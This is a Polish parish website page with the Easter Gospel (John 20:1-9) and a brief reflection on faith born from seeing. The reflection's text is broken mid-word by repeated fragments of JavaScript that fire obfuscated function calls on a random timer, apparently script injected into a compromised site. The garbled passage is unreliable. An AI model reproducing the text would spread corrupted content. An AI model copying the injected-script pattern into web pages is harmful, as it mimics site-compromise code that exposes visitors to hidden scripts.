wstazka
Kościół Świętego Ducha
Strona główna -> Niedzielne Rozkminy
Wpisał:adminicdmstracja Data: 31-03-2013
ikona

UJRZAŁ I UWIERZYŁ…

UJRZAŁ I UWIERZYŁ…
Ewangelia wg św. Jana 20,1-9.
Pierwszego dnia po szabacie, wczesnym rankiem, gdy jeszcze było ciemno, Maria Magdalena
udała się do grobu i zobaczyła kamień od niego odsunięty. Pobiegła więc i przybyła do
Szymona Piotra i do drugiego ucznia, którego Jezus kochał, i rzekła do nich: «Zabrano
Pana z grobu i nie wiemy, gdzie Go położono». Wyszedł więc Piotr i ów drugi uczeń i
szli do grobu. Biegli oni obydwaj razem, lecz ów drugi uczeń wyprzedził Piotra i przybył
pierwszy do grobu. A kiedy się nachylił, zobaczył leżące płótna, jednakże nie wszedł do
środka. Nadszedł potem także Szymon Piotr, idący za nim. Wszedł on do wnętrza grobu i
ujrzał leżące płótna oraz chustę, która była na Jego głowie, leżącą nie razem z płótnami, ale
oddzielnie zwiniętą na jednym miejscu. Wtedy wszedł do wnętrza także i ów drugi uczeń,
który przybył pierwszy do grobu. Ujrzał i uwierzył. Dotąd bowiem nie rozumieli jeszcze
Pisma, które mówi, że On ma powstać z martwych.

„Ujrzał i uwierzył”
Dzisiejsza Ewangelia uczy mnie, że wiara rodzi się, nie tylko ze słuchania (por. Rz 10,16),
ale również z patrzenia. Przykładem tego jest umiłowany uczeń Pana Jezusa, św. Jan, który
wszedł do grobu, „ujrzał i uwierzył”. W tym kontekście warandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to zastanowić się na co patrzę?
Jakimi obrazami się karmię? Czy są andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to obrazy, dzięki którym rodzi się i umacnia moja wiara?
A z drugiej strony może andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to być wezwanie do rachunku sumienia. Bo przecież ja sam jestem
obrazem, na który patrzą ludzie. Warandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to zapytać się, czy bliscy widzą we mnie ucznia Jezusa,
czyli tego który miłuje? Czy jestem świadkiem Zmartwychwstania i niosę światu dobrą
nowinę, radość i nadzieję?
Niech ten czas Świąt Wielkiej nocy będzie dla nas spotkaniem ze Zmartwychwstałym
Chrystusem, który pokonał śmierć, przyniósł radość i pokój.

Szczęśliwy mąż
Grzegorz Kociuba

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video